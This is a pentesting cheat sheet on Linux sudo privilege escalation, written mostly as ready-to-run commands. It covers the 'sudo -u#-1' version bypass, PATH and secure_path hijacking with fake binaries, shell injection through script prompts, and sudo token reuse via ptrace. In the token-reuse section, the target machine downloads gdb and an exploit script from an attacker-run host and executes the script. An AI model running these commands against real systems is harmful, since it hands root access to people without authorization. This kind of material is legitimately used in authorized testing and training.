Sudo Privilege Escalation

GTFOBins

GTFOBins provides a wide variety of payloads to privilege escalation.
So it's recommended to look for in there.

Investigation

Version

sudo --version

Copied!

If the sudo version <=1.28, try the following command.

sudo -u#-1 /bin/bash

Copied!

As Another Users

sudo su root
sudo -u john whoami
# -s: run shell as target user
sudo -s

Copied!

Sudo commands (Sudoers)

sudo -l
sudo -ll

# Specify hostname
sudo -h <host-name> -l
# Execute via the hostname
sudo -h <host-name> /bin/bash

Copied!

Also we might see from following files.

cat /etc/sudoers
cat /etc/sudoers.d/usersgroup

Copied!

If we find the following result for sudoers,

(ALL, !root) NOPASSWD: /bin/bash

Copied!

We might be able to get a root shell as follow.

sudo -u#-1 /bin/bash

Copied!

Command Forgery (NOPASSWD)

If you are allowed to execute some command, you can forge the contents of the command.
First off, check the properties.

sudo -l
(root) NOPASSWD: somecmd

Copied!

If you can confirm that it can be executed as root without password, create the same named command in the arbitrary folder in which you can write files.

# option 1
echo /bin/sh > /tmp/somecmd

Copied!

Next, change the permission for allowing to execute it.
And add the path to the environment.

chmod +x /tmp/somecmd
export PATH=/tmp:$PATH

Copied!

Now execute the command as root.

sudo somecmd
whoami
# root

Copied!

Command Forgery (SETENV, NOPASSWD)

If you found there is a SETENV: in sudoers, you can set the PATH when running the command.

sudo -l
(root) SETENV: NOPASSWD: somecmd

Copied!

As the previous section, prepare the payload.

echo '/bin/bash -p' > /tmp/somecmd
chmod +x /tmp/somecmd

Copied!

Now run the command as root with setting the PATH.

sudo PATH=/tmp:$PATH somecmd
whoami

Copied!

Command Path Hijacking

sudo -l

env_reset
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

(root) python /home/user/example.py

Copied!

If we can execute some command as root but env_reset and secure_path are set, we cannot override the PATH environment variable.
Instead we need to check if we have permission to write each path.

ls -al /usr/local/
ls -al /usr/
ls -al /

Copied!

Assume we can write an arbitrary binary file under /usr/sbin, we can create a payload in there.
For example, we create a python binary under /usr/sbin.

echo /bin/bash > /usr/sbin/python
chmod +x /usr/sbin/python

Copied!

Then execute the sudo command.

sudo python /home/user/example.py

Copied!

Now we should get a root shell.

Shell in Prompt

#!/bin/bash

read -p "What's you name: "

Copied!

If we found there is another user’s script which can be executed as root, you can input `/bin/bash -i` to get a shell as another user.

Reuse Sudo Tokens

Reference: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens

If the current user executes some command using sudo, we might be able to escalate to root privilege. Check if no restriction on ptrace.

cat /proc/sys/kernel/yama/ptrace_scope
0

# We can temporariliy set 0 if we have permissions.
echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope

Copied!

If the target system does not have gdb binary, we can download it.

# In local machine, download the debian package.
wget http://fi.archive.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_9.1-0ubuntu1_amd64.deb -O gdb.deb
python3 -m http.server

# In remote machine, download the deb package and extract it.
wget http://10.0.0.1:8000/gdb.deb
dpkg -x gdb.deb ~

Copied!

Next, prepare the exploit script from the repo and execute it.

# In local machine, download the shell script to exploit.
wget https://github.com/nongiach/sudo_inject/blob/master/exploit.sh
python3 -m http.server

# In remote machine, download it and execute.
wget http://10.0.0.1:8000/exploit.sh
sh exploit.sh

Copied!

After that, we can spawn the root shell.

/tmp/activate_sudo_token
sudo su

Copied!